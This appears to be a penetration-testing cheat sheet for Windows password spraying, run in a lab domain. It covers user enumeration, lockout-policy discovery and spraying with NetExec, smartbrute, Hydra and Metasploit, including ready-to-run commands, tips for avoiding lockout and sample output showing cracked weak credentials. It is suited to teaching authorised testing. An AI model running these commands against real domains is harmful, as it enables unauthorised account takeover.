========================================================================================================================================================================
Windows Password Spraying Attacks 
========================================================================================================================================================================

The objective of a Windows password spraying attack is to attempt to access a large number of Windows domain accounts (usernames) with a very few commonly used passwords 
(e.g. login=password, P@ssw0rd, Welcome1, month+date such as "Jan2020!" or "Jan@2020").

During a password spray attack (unlike a classical password bruteforce attack) only 1 or 2 passwords are used against many different accounts to avoid account lockout that
would normally occur when brute-forcing a single account with many passwords. 
In addition, to limit the probability of locking-out Windows accounts, it is recommended to wait between 2 password spray attacks and to take into account the "Lockout threshold", 
"Lockout duration" and the "Lockout observation window". 


=====================================================================================================================================================
STEP 1 - Windows account enumeration
=====================================================================================================================================================

--------------------------------------------------------------------------------------------
1. NetExec (network service exploitation tool)
--------------------------------------------------------------------------------------------

=> https://github.com/Pennyw0rth/NetExec

$ nxc smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE' --users

Example - Enumerate Domain Users:

┌──(kali㉿kali)-[~]
└─$ nxc smb 192.168.1.17 -u lowprivuser -p 'p@ssw0rd1' --users
SMB         192.168.1.17    445    DOMAINCONTROLLE  [*] Windows Server 2022 Build 20348 x64 (name:DOMAINCONTROLLE) (domain:lab.local) (signing:True) (SMBv1:False)
SMB         192.168.1.17    445    DOMAINCONTROLLE  [+] lab.local\lowprivuser:p@ssw0rd1
SMB         192.168.1.17    445    DOMAINCONTROLLE  -Username-                     -Last PW Set-       -BadPW- -Description-
SMB         192.168.1.17    445    DOMAINCONTROLLE  Administrator                  2025-07-25 16:20:16 0       Built-in account for administering the computer/domain
SMB         192.168.1.17    445    DOMAINCONTROLLE  Guest                          <never>             0       Built-in account for guest access to the computer/domain
SMB         192.168.1.17    445    DOMAINCONTROLLE  krbtgt                         2025-07-25 16:13:30 0       Key Distribution Center Service Account
SMB         192.168.1.17    445    DOMAINCONTROLLE  user1.adm              		  2025-07-25 16:22:59 0
SMB         192.168.1.17    445    DOMAINCONTROLLE  user2.adm                 	  2025-07-25 16:23:03 0
SMB         192.168.1.17    445    DOMAINCONTROLLE  user3.adm               	     2025-07-25 16:23:06 0
SMB         192.168.1.17    445    DOMAINCONTROLLE  user1            			     2025-07-25 16:23:13 0
SMB         192.168.1.17    445    DOMAINCONTROLLE  user2                    	     2025-07-25 16:23:13 0
SMB         192.168.1.17    445    DOMAINCONTROLLE  user3                 		     2025-07-25 16:23:13 0
<SNIP>


--------------------------------------------------------------------------------------------
2. ADrecon.ps1
--------------------------------------------------------------------------------------------

=> https://github.com/adrecon/ADRecon

PS C:\temp> .\ADRecon.ps1 -Method ADWS -DomainController <DC-IP> -Credential domain\username -Collect default


--------------------------------------------------------------------------------------------
3. Impacket script "GetADUsers.py"
--------------------------------------------------------------------------------------------

=> https://github.com/fortra/impacket

jeff@kali:~/Documents/$ GetADUsers.py -all -dc-ip <DC-IP> domain/username


--------------------------------------------------------------------------------------------
4. Enum4Linux
--------------------------------------------------------------------------------------------

$ enum4linux -u username -p password -a <DC-IP> > Domain-Enum.txt


--------------------------------------------------------------------------------------------
6. Other tools
--------------------------------------------------------------------------------------------

BloodHound, etc


============================================================================================================================
STEP 2 - Check the domain password policies to ensure that you will not lockout accounts during your password spray attack
============================================================================================================================

--------------------------------------------------------------------------------------------
1. Use native Windows commands on a domain joined Windows machine
--------------------------------------------------------------------------------------------

a) Commands to display the default domain password policy
---------------------------------------------------------

C:\> net accounts /domain

Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          180
Minimum password length:                              10
Length of password history maintained:                24
Lockout threshold:                                    7
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        PRIMARY
The command completed successfully.


PS C:\> Get-ADDefaultDomainPasswordPolicy

ComplexityEnabled           : True
DistinguishedName           : DC=Lab,DC=Local
LockoutDuration             : 00:30:00
LockoutObservationWindow    : 00:30:00
LockoutThreshold            : 0
MaxPasswordAge              : 180.00:00:00
MinPasswordAge              : 1.00:00:00
MinPasswordLength           : 10
objectClass                 : {domainDNS}
objectGuid                  : 74f87b52-4596-41e3-a58b-b9f2b77ed2be
PasswordHistoryCount        : 24
ReversibleEncryptionEnabled : False


b) Command to display the 'Fine Grained Password Policies' (FGPPs) 
------------------------------------------------------------------

PS C:\> Get-ADFineGrainedPasswordPolicy -filter *

AppliesTo                   : {CN=Domain Admins,CN=Users,DC=Lab,DC=Local}
ComplexityEnabled           : True
DistinguishedName           : CN=Fine grained pwd for Domain Admins,CN=Password Settings
                              Container,CN=System,DC=Lab,DC=Local
LockoutDuration             : 00:20:00
LockoutObservationWindow    : 00:15:00
LockoutThreshold            : 7
MaxPasswordAge              : 42.00:00:00
MinPasswordAge              : 1.00:00:00
MinPasswordLength           : 16
Name                        : Fine grained pwd for Domain Admins
ObjectClass                 : msDS-PasswordSettings
ObjectGUID                  : 6e85062c-b389-4b32-8aff-a09651ed1af8
PasswordHistoryCount        : 3
Precedence                  : 1
ReversibleEncryptionEnabled : False


C) Command to display the password policy applied for a user
------------------------------------------------------------

> PS C:\> Get-ADUserResultantPasswordPolicy domain-admin-user

AppliesTo                   : {CN=Domain Admins,CN=Users,DC=Lab,DC=Local}
ComplexityEnabled           : True
DistinguishedName           : CN=Fine grained pwd for Domain Admins,CN=Password Settings
                              Container,CN=System,DC=Lab,DC=Local
LockoutDuration             : 00:20:00
LockoutObservationWindow    : 00:15:00
LockoutThreshold            : 7
MaxPasswordAge              : 42.00:00:00
MinPasswordAge              : 1.00:00:00
MinPasswordLength           : 16
Name                        : Fine grained pwd for Domain Admins
ObjectClass                 : msDS-PasswordSettings
ObjectGUID                  : 6e85062c-b389-4b32-8aff-a09651ed1af8
PasswordHistoryCount        : 3
Precedence                  : 1
ReversibleEncryptionEnabled : False


--------------------------------------------------------------------------------------------
2. NetExec (network service exploitation tool)
--------------------------------------------------------------------------------------------

$ nxc smb $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --pass-pol

Example: 

┌──(kali㉿kali)-[~/Downloads]
└─$ nxc smb 192.168.1.17 -d lab.local -u userl -p Welcome2025 --pass-pol
SMB         192.168.1.17    445    DOMAINCONTROLLE  [*] Windows Server 2022 Build 20348 x64 (name:DOMAINCONTROLLE) (domain:lab.local) (signing:True) (SMBv1:False)
SMB         192.168.1.17    445    DOMAINCONTROLLE  [+] lab.local\userl:Welcome2025
SMB         192.168.1.17    445    DOMAINCONTROLLE  [+] Dumping password info for domain: lab.local
SMB         192.168.1.17    445    DOMAINCONTROLLE  Minimum password length: 10
SMB         192.168.1.17    445    DOMAINCONTROLLE  Password history length: 24
SMB         192.168.1.17    445    DOMAINCONTROLLE  Maximum password age: 89 days 23 hours 54 minutes
SMB         192.168.1.17    445    DOMAINCONTROLLE
SMB         192.168.1.17    445    DOMAINCONTROLLE  Password Complexity Flags: 000001
SMB         192.168.1.17    445    DOMAINCONTROLLE      Domain Refuse Password Change: 0
SMB         192.168.1.17    445    DOMAINCONTROLLE      Domain Password Store Cleartext: 0
SMB         192.168.1.17    445    DOMAINCONTROLLE      Domain Password Lockout Admins: 0
SMB         192.168.1.17    445    DOMAINCONTROLLE      Domain Password No Clear Change: 0
SMB         192.168.1.17    445    DOMAINCONTROLLE      Domain Password No Anon Change: 0
SMB         192.168.1.17    445    DOMAINCONTROLLE      Domain Password Complex: 1
SMB         192.168.1.17    445    DOMAINCONTROLLE
SMB         192.168.1.17    445    DOMAINCONTROLLE  Minimum password age: 1 day 4 minutes
SMB         192.168.1.17    445    DOMAINCONTROLLE  Reset Account Lockout Counter: 30 minutes
SMB         192.168.1.17    445    DOMAINCONTROLLE  Locked Account Duration: 30 minutes
SMB         192.168.1.17    445    DOMAINCONTROLLE  Account Lockout Threshold: 7
SMB         192.168.1.17    445    DOMAINCONTROLLE  Forced Log off Time: Not Set


--------------------------------------------------------------------------------------------
3. Enum4linux-ng
--------------------------------------------------------------------------------------------

Domain password policy obtained through MS-RPC:

$ enum4linux-ng -P -w -u $USER -p $PASSWORD $DOMAIN_CONTROLLER


--------------------------------------------------------------------------------------------
4. Ldapsearch-ad 
--------------------------------------------------------------------------------------------

Domain password policy obtained through LDAP:

$ ldapsearch-ad.py -l $LDAP_SERVER -d $DOMAIN -u $USER -p $PASSWORD -t pass-pol


--------------------------------------------------------------------------------------------
5. ADrecon.ps1
--------------------------------------------------------------------------------------------

PS C:\Users\Administrator\Documents\ADRecon-master> .\ADRecon.ps1 -Method ADWS -DomainController <DC-IP> -Credential domain\username -Collect default


--------------------------------------------------------------------------------------------
6. Other tools
--------------------------------------------------------------------------------------------

PingCastle, ADexplorer, etc


============================================================================================================================
STEP 3 - Windows password spray attacks
============================================================================================================================

--------------------------------------------------------------------------------------------
1. NetExec (network service exploitation tool)
--------------------------------------------------------------------------------------------

a) Password spraying using a username list and 1 password
---------------------------------------------------------

   $ nxc smb target_ip -d domain.local -u /path/to/users.txt -p "P@ssw0rd" --no-bruteforce --continue-on-succes

   Example
   -------
   
   ┌──(kali㉿kali)-[~/Downloads]
   └─$ nxc smb 192.168.1.17 -u /home/kali/Downloads/users-list.txt -p Welcome2025 --no-bruteforce --continue-on-success
   SMB         192.168.1.17    445    DOMAINCONTROLLE  [*] Windows Server 2022 Build 20348 x64 (name:DOMAINCONTROLLE) (domain:lab.local) (signing:True) (SMBv1:False)
   SMB         192.168.1.17    445    DOMAINCONTROLLE  [+] lab.local\user1:Welcome2025
   SMB         192.168.1.17    445    DOMAINCONTROLLE  [+] lab.local\user2:Welcome2025
   SMB         192.168.1.17    445    DOMAINCONTROLLE  [-] lab.local\user3:Welcome2025 STATUS_LOGON_FAILURE
   SMB         192.168.1.17    445    DOMAINCONTROLLE  [-] lab.local\user1.adm:Welcome2025 STATUS_LOGON_FAILURE
   SMB         192.168.1.17    445    DOMAINCONTROLLE  [-] lab.local\user2.adm:Welcome2025 STATUS_LOGON_FAILURE
   SMB         192.168.1.17    445    DOMAINCONTROLLE  [-] lab.local\user3.adm:Welcome2025 STATUS_ACCOUNT_RESTRICTION
   <SNIP>


b) Password spraying - Checking one login equal one password using wordlists
----------------------------------------------------------------------------

   $ nxc smb target_ip -u /path/to/users.txt -p /path/to/users.txt --no-bruteforce --continue-on-success

   No bruteforce possible with this one as 1 user = 1 password. The result will be:
	user1 => password1
	user2 => password2


c) Password spraying - Checking 'username == password' using wordlists
----------------------------------------------------------------------

   $ nxc smb target_ip -u /path/to/users.txt -p /path/to/users.txt --no-bruteforce --continue-on-success


d) Password spraying targeting a few accounts with a few passwords
------------------------------------------------------------------

   $ nxc smb target_ip -u user1 user2 user3 -p password1 password2 --continue-on-success

   Example
   -------

	┌──(kali㉿kali)-[~]
	└─$ nxc smb 192.168.1.17 -u user1 user2 user1.adm user2.adm user3.adm -p Summer2025! P@ssw0rd Welcome2025 --continue-on-success
	SMB         192.168.1.17    445    DOMAINCONTROLLE  [*] Windows Server 2022 Build 20348 x64 (name:DOMAINCONTROLLE) (domain:lab.local) (signing:True) (SMBv1:False)
	SMB         192.168.1.17    445    DOMAINCONTROLLE  [-] lab.local\user1:Summer2025! STATUS_LOGON_FAILURE
	SMB         192.168.1.17    445    DOMAINCONTROLLE  [-] lab.local\user2:Summer2025! STATUS_LOGON_FAILURE
	SMB         192.168.1.17    445    DOMAINCONTROLLE  [-] lab.local\user1.adm:Summer2025! STATUS_LOGON_FAILURE
	SMB         192.168.1.17    445    DOMAINCONTROLLE  [-] lab.local\user2.adm:Summer2025! STATUS_LOGON_FAILURE
	SMB         192.168.1.17    445    DOMAINCONTROLLE  [-] lab.local\user3.adm:Summer2025! STATUS_ACCOUNT_RESTRICTION
	SMB         192.168.1.17    445    DOMAINCONTROLLE  [-] lab.local\user1:P@ssw0rd STATUS_LOGON_FAILURE
	SMB         192.168.1.17    445    DOMAINCONTROLLE  [-] lab.local\user2:P@ssw0rd STATUS_LOGON_FAILURE
	SMB         192.168.1.17    445    DOMAINCONTROLLE  [-] lab.local\user1.adm:P@ssw0rd STATUS_LOGON_FAILURE
	SMB         192.168.1.17    445    DOMAINCONTROLLE  [-] lab.local\user2.adm:P@ssw0rd STATUS_LOGON_FAILURE
	SMB         192.168.1.17    445    DOMAINCONTROLLE  [-] lab.local\user3.adm:P@ssw0rd STATUS_ACCOUNT_RESTRICTION
	SMB         192.168.1.17    445    DOMAINCONTROLLE  [+] lab.local\user1:Welcome2025
	SMB         192.168.1.17    445    DOMAINCONTROLLE  [+] lab.local\user2:Welcome2025
	SMB         192.168.1.17    445    DOMAINCONTROLLE  [-] lab.local\user1.adm:Welcome2025 STATUS_LOGON_FAILURE
	SMB         192.168.1.17    445    DOMAINCONTROLLE  [-] lab.local\user2.adm:Welcome2025 STATUS_LOGON_FAILURE
	SMB         192.168.1.17    445    DOMAINCONTROLLE  [-] lab.local\user3.adm:Welcome2025 STATUS_ACCOUNT_RESTRICTION


--------------------------------------------------------------------------------------------
2. SmartBrute (Bruteforcing with lockout policies)
--------------------------------------------------------------------------------------------

=> https://github.com/ShutdownRepo/smartbrute

Password spraying and bruteforcing tool for Active Directory Domain Services.

> Smart mode

  This mode can be used to make sure NOT to lock any account when bruteforcing by:

  + Fetching the enabled users from Active Directory
  + Fetching bad password count for each user
  + Fetching lockout policies (global policy and granular policies set in Password Settings Objects). 
    Nota bene: PSOs can be applied to groups, the tool recursively lists all members from those groups and sets the appropriate 
	lockout threshold for each user.
  + Bruteforcing users according to the information found (i.e. keep the bad password count below the lockout threshold. 
    A safety margin can be set.


a) smartbrute example with a dynamic user list

   $ smartbrute -v smart -bp "password" kerberos -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --kdc-ip "$KDC" kerberos

b) smartbrute example with a static users list
   
   $ smartbrute brute -bU users.txt -bp "password" kerberos --kdc-ip "$KDC"


--------------------------------------------------------------------------------------------
2. HYDRA /xHYDRA (GUI)
--------------------------------------------------------------------------------------------

jeff@kali:~/Documents/$ xhydra

Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-28 12:17:32
[DATA] max 1 task per 1 server, overall 1 task, 958 login tries (l:479/p:2), ~958 tries per task
[DATA] attacking smb://192.168.1.50:445/Both
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)

[445][smb] host: 192.168.1.50   login: EVA_KEY   password: EVA_KEY

1 of 1 target successfully completed, 1 valid password found

Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-28 12:17:43
<finished>


-------------------------------------------------------------------------------------------------------
3. Metasploit module "smb_login"
-------------------------------------------------------------------------------------------------------

Option 1 - Use a dictionnary file containing users and passwords separated by space, one pair per line
-------------------------------------------------------------------------------------------------------

msf5 auxiliary(scanner/smb/smb_login) > options

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting                                                                       Required  Description
   ----               ---------------                                                                       --------  -----------
   ABORT_ON_LOCKOUT   false                                                                                 yes       Abort the run when an account lockout is detected
   BLANK_PASSWORDS    false                                                                                 no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                                                                                     yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS       false                                                                                 no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false                                                                                 no        Add all passwords in the current database to the list
   DB_ALL_USERS       false                                                                                 no        Add all users in the current database to the list
   DETECT_ANY_AUTH    false                                                                                 no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false                                                                                 no        Detect if domain is required for the specified user
   PASS_FILE                                                                                                no        File containing passwords, one per line
   PRESERVE_DOMAINS   true                                                                                  no        Respect a username that contains a domain name.
   Proxies                                                                                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST       false                                                                                 no        Record guest-privileged random logins to the database
   RHOSTS             192.168.1.50                                                                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT              445                                                                                   yes       The SMB service port (TCP)
   SMBDomain          Security-Test-Lab                                                                     no        The Windows domain to use for authentication
   SMBPass                                                                                            	    no        The password for the specified username
   SMBUser                                                                                                  no        The username to authenticate as
   STOP_ON_SUCCESS    false                                                                                 yes       Stop guessing when a credential works for a host
   THREADS            1                                                                                     yes       The number of concurrent threads (max one per host)
   USERPASS_FILE      /home/jeff/Documents/CTFs/BadBlood/Credentials & Info dump/Password-spraying-all.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS       false                                                                                 no        Try the username as the password for all users
   USER_FILE                                                                                                no        File containing usernames, one per line
   VERBOSE            false                                                                                 yes       Whether to print output for all attempts

msf5 auxiliary(scanner/smb/smb_login) > run

[+] 192.168.1.50:445      - 192.168.1.50:445 - Success: 'Security-Test-Lab\backup:P@sswOrd' Administrator
[*] 192.168.1.50:445      - 192.168.1.50:445 - Correct credentials, but unable to login: 'Security-Test-Lab\EVA_KEY:EVA_KEY',
[*] 192.168.1.50:445      - 192.168.1.50:445 - Correct credentials, but unable to login: 'Security-Test-Lab\HECTOR_BRADY:Welcome1',
[*] 192.168.1.50:445      - 192.168.1.50:445 - Correct credentials, but unable to login: 'Security-Test-Lab\JEAN_MOON:12345678',
[+] 192.168.1.50:445      - 192.168.1.50:445 - Success: 'Security-Test-Lab\Webserver-adm-svc:Webserver-adm-svc'
[*] 192.168.1.50:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_login) > 



Option 2 - Try the username as the password for all users
----------------------------------------------------------

msf5 auxiliary(scanner/smb/smb_login) > options

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting                                                                  Required  Description
   ----               ---------------                                                                  --------  -----------
   ABORT_ON_LOCKOUT   false                                                                            yes       Abort the run when an account lockout is detected
   BLANK_PASSWORDS    false                                                                            no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                                                                                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS       false                                                                            no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false                                                                            no        Add all passwords in the current database to the list
   DB_ALL_USERS       false                                                                            no        Add all users in the current database to the list
   DETECT_ANY_AUTH    false                                                                            no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false                                                                            no        Detect if domain is required for the specified user
   PASS_FILE                                                                                           no        File containing passwords, one per line
   PRESERVE_DOMAINS   true                                                                             no        Respect a username that contains a domain name.
   Proxies                                                                                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST       false                                                                            no        Record guest-privileged random logins to the database
   RHOSTS             192.168.1.50                                                                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT              445                                                                              yes       The SMB service port (TCP)
   SMBDomain          Security-Test-Lab                                                                no        The Windows domain to use for authentication
   SMBPass                                                                                             no        The password for the specified username
   SMBUser                                                                                             no        The username to authenticate as
   STOP_ON_SUCCESS    false                                                                            yes       Stop guessing when a credential works for a host
   THREADS            1                                                                                yes       The number of concurrent threads (max one per host)
   USERPASS_FILE                                                                                       no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS       true                                                                             no        Try the username as the password for all users
   USER_FILE          /home/jeff/Documents/CTFs/BadBlood/Credentials & Info dump/Domain-users-all.txt  no        File containing usernames, one per line
   VERBOSE            true                                                                             yes       Whether to print output for all attempts

msf5 auxiliary(scanner/smb/smb_login) > run

<SNIP>
[-] 192.168.1.50:445      - 192.168.1.50:445 - Failed: 'Security-Test-Lab\WARD_BYRD:WARD_BYRD',
[-] 192.168.1.50:445      - 192.168.1.50:445 - Failed: 'Security-Test-Lab\WARD_CRAIG:WARD_CRAIG',
[-] 192.168.1.50:445      - 192.168.1.50:445 - Failed: 'Security-Test-Lab\WAYNE_MORALES:WAYNE_MORALES',
[+] 192.168.1.50:445      - 192.168.1.50:445 - Success: 'Security-Test-Lab\Webserver-adm-svc:Webserver-adm-svc'
<SNIP>
